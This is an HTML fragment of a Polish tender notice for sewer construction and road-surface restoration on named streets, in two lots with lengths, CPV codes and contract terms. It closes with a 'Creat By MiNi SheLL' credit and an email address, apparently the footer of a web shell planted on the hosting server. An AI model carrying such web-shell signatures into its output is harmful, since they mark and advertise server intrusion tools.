<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest dofinansowany ze środków Programu Operacyjnego Infrastruktura i Środowisko w ramach Priorytetu I Gospodarka wodno - ściekowa, działanie 1.1 Gospodarka wodno - ściekowa w aglomeracji powyżej 15 tys. RLM..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I - Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni w ul. Mickiewicza - Zaułek, 11 Listopada, Wysockiego, Słowackiego, Orzeszkowa, Myśliwska i Sadowa..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje wykonanie kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni po kanałach na całej szerokości jezdni zgodnie z dokumentacją projektową oraz specyfikacją techniczną wykonania i odbioru robot ;
a)	ul. Mickiewicza - zaułek
- budowa kanalizacji sanitarnej grawitacyjnej długości 93,00 m, 
- budowa kanalizacji sanitarnej tłocznej długości 106,00 m
-  budowa przepompowni ścieków - 1 szt. 
- odtworzenie nawierzchni po trasie kanałów
b)	ul. 11 Listopada
- budowa kanalizacji sanitarnej grawitacyjnej długości 2170,00 m,
- budowa kanalizacji sanitarnej tłocznej długości 310,00 m,
-  budowa przepompowni ścieków - 1 szt. 
- odtworzenie nawierzchni po trasie kanałów
c)	ul. Wysockiego
- budowa kanalizacji sanitarnej grawitacyjnej długości 539,00 m, 
- budowa kanalizacji deszczowej długości 487,00 m, 
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
d)	ul. Słowackiego
- budowa kanalizacji sanitarnej grawitacyjnej długości 234,00 m,
- budowa kanalizacji deszczowej długości 362,00 m,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
e)	ul. E. Orzeszkowej
- budowa kanalizacji sanitarnej grawitacyjnej długości 510,00 m,
- budowa kanalizacji deszczowej długości 562,00 m,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
f)	ul. Myśliwska
- budowa kanalizacji sanitarnej grawitacyjnej długości 294,00 m,
- budowa kanalizacji deszczowej długości 300,00 m,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
g)	ul. Sadowa
- budowa kanalizacji sanitarnej grawitacyjnej długości 113,00 m,
- budowa kanalizacji deszczowej długości 244,00 m,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
Szczegółowy opis przedmiotu zamówienia został przedstawiony w dokumentacji projektowej - projektach wykonawczych, szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz przedmiarach robót, stanowiących  załączniki do niniejszej  siwz.
Roboty będące przedmiotem niniejszej umowy (kontraktu) będą wykonane zgodnie z  WARUNKAMI KONTRAKTOWYMI DLA BUDOWY dla robót inżynieryjno - budowlanych projektowanych przez Zamawiającego ( Czerwony FIDIC ) .
 Wspólny Słownik Zamówień (CPV) : 45 23 24 40 - 8, 45 23 21 30 - 2, 45233252-0.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.40-8, 45.23.21.30-2, 45.23.32.52-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II -Opracowanie dokumentacji projektowej i budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni w ulicy Rejtana, Żeromskiego, 3-go Maja, Kościuszki i Szkolnej  ..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje zaprojektowanie i wykonanie kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni po kanałach na całej szerokości jezdni zgodnie z dokumentacją projektową oraz specyfikacją techniczną wykonania i odbioru robot ;
Wykonawca uzyska wszelkie wymagane, zgodnie z polskim prawem, uzgodnienia, opinie i decyzje administracyjne niezbędne do opracowania dokumentacji projektowej, a w szczególności :
      a. przygotuje materiały niezbędne do uzyskania decyzji o środowiskowych           uwarunkowaniach  zgody  na  realizację  przedsięwzięcia i uzyska ją, 
      b. opracuje raport  o  oddziaływaniu  na  środowisko, o  ile  takowy  będzie konieczny
      c. przygotuje materiały niezbędne do uzyskania decyzji o ustaleniu lokalizacji inwestycji celu    publicznego oraz ją uzyska,
      d. opracuje operat wodnoprawny oraz uzyska pozwolenie  wodnoprawne  wraz z wykonaniem  wszelkich  niezbędnych  do  tego  celu  badań, opracowań  i analiz ( o ile  będzie  konieczne), 
      e. wykona  pomiary  geodezyjne  i  inwentaryzacyjne, o  ile  takowe  będą konieczne, 
      f. wykona  badania   geotechniczne  gruntu,
      g. opracuje  inne, uznane  za  konieczne  przez  Wykonawcę  bądź  stosowne instytucje  i urzędy, opracowania  i  badania, 
      h. opracuje kompletną dokumentację projektowo - kosztorysową wraz z projektami branżowymi w zakresie określonym w projekcie umowy    
      i. uzyska wszelkie uzgodnienia , opinie i materiały niezbędne do uzyskania pozwolenia na budowę, 
1) Przed przystąpieniem do projektowania, Wykonawca opracuje koncepcję proponowanych rozwiązań i przedłoży ją do akceptacji Zamawiającego, jak również uzyska akceptację jednostek opiniujących.
2) Opracowana dokumentacja musi spełniać wymagania określone aktualnymi przepisami prawa, m.in.:
-	Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003 r., Nr 120, poz. 1133 z póź. zm.), 
-	Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych  wykonania i odbioru  robót  budowlanych  oraz  programu funkcjonalno - użytkowego  (Dz. U. Nr. 202, poz. 2072  z póź. zm.),
-	Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 roku  w  sprawie określenia  metod  i  podstaw  sporządzania  kosztorysu  inwestorskiego, obliczania planowanych  kosztów  prac  projektowych  oraz  planowanych  kosztów  robót budowlanych  określonych  w  programie  funkcjonalno - użytkowym  (Dz. U. Nr 130, poz. 1389),
                 
a)	ul. Rejtana
- budowa kanalizacji sanitarnej długości ok. 0,8 km 
- odtworzenie nawierzchni po trasie kanału
b)	ul. Żeromskiego
- budowa kanalizacji sanitarnej długości ok. 0,5km,
- budowa kanalizacji deszczowej długości  ok. 0,6 km,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
c)	ul. 3-go Maja
- budowa kanalizacji sanitarnej długości ok. 0,5 km, 
- budowa kanalizacji deszczowej długości ok. 0,5 km, 
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
d)	ul. Kościuszki
- budowa kanalizacji sanitarnej długości ok. 0,4 km,
- budowa kanalizacji deszczowej długości ok. 0,3 km,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
e)	ul. Szkolna
- budowa kanalizacji sanitarnej długości  ok. 0,24 km,
- budowa kanalizacji deszczowej długości  ok. 0,24 km,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
Wspólny Słownik Zamówień ( CPV) -71320000 - 7, 45232440-8, 45232130 - 2, 45233252 - 0
Szczegółowy opis przedmiotu zamówienia został przedstawiony w programie funkcjonalno - użytkowym.
Roboty będące przedmiotem niniejszej umowy (kontraktu) będą wykonane zgodnie z  WARUNKAMI KONTRAKTOWYMI DLA URZĄDZEŃ ORAZ PROJEKTOWANIA I BUDOWY dla urządzeń elektrycznych i mechanicznych oraz robot inżynieryjnych i budowlanych projektowanych przez Wykonawcę ( Żółty FIDIC)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.23.24.40-8, 45.23.21.30-2, 45.23.32.52-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com